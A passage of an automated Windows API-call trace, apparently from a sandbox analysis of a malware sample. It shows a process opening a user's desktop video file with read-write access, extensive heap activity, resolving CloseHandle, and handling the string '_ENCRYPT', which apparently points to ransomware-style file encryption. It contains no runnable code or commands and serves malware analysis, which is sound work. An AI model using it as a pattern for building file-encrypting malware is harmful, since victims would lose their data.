out: hHeap=0x8a0000) returned 1 [0167.851] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\urmveyqgrc9wpf_wa.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0167.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0167.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0167.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0167.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0167.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0167.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0167.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0167.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0167.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0167.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0167.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0167.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0167.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0167.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=60, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0167.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x78) returned 0x8afe68 [0167.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=60, lpWideCharStr=0x8afe68, cchWideChar=60 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4") returned 60 [0167.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0167.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0167.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8afe68 | out: hHeap=0x8a0000) returned 1 [0167.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0167.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0167.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0167.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0167.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0167.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0167.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0167.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0167.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0167.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0167.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0167.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0167.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0167.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0167.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0167.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0167.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0167.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0167.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0167.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0167.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0167.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0167.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0167.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0167.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0167.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0167.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0167.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0167.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0167.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0167.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0167.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0167.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0167.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0167.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0167.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0167.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0167.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0167.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0167.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0167.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0167.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0167.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0167.856] FreeLibrary (hLibModule=0x75990000) returned 1 [0167.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0167.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0167.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0167.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0167.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0167.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0167.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0167.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0167.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0167.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0167.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0167.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0167.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0167.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0167.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0167.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0167.858] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0167.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0167.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0167.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0167.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0167.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0167.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0167.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0167.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0167.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0167.858] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0167.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0167.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0167.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0167.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0167.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0167.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0167.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0167.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0167.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0167.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0167.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0167.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0167.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0167.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0167.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0167.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0167.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0167.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0167.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0167.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0167.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0167.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0167.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0167.859] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0167.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0167.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0167.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0167.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0167.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0167.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0167.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0167.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0167.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0167.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0167.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0167.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0167.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0167.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0167.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0167.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0167.860] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0167.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0167.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0167.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0167.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd618 [0167.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd618, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0167.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0167.861] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0167.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0167.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0167.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0167.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0167.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0167.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0167.861] CloseHandle (hObject=0x138) returned 1 [0167.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0167.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0167.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0167.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0167.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0167.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0167.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0167.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0167.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0167.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0167.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0167.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0167.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0167.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0167.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0167.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0167.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0167.862] FreeLibrary (hLibModule=0x75990000) returned 1 [0167.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0167.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0167.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0167.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0167.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0167.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0167.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0167.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0167.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0167.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0167.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0167.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0167.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0167.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0167.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0167.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0167.862] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0167.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0167.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0167.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0167.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0167.863] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0167.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0167.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0167.863] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0167.863] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0167.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0167.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0167.863] CharUpperBuffW (in: 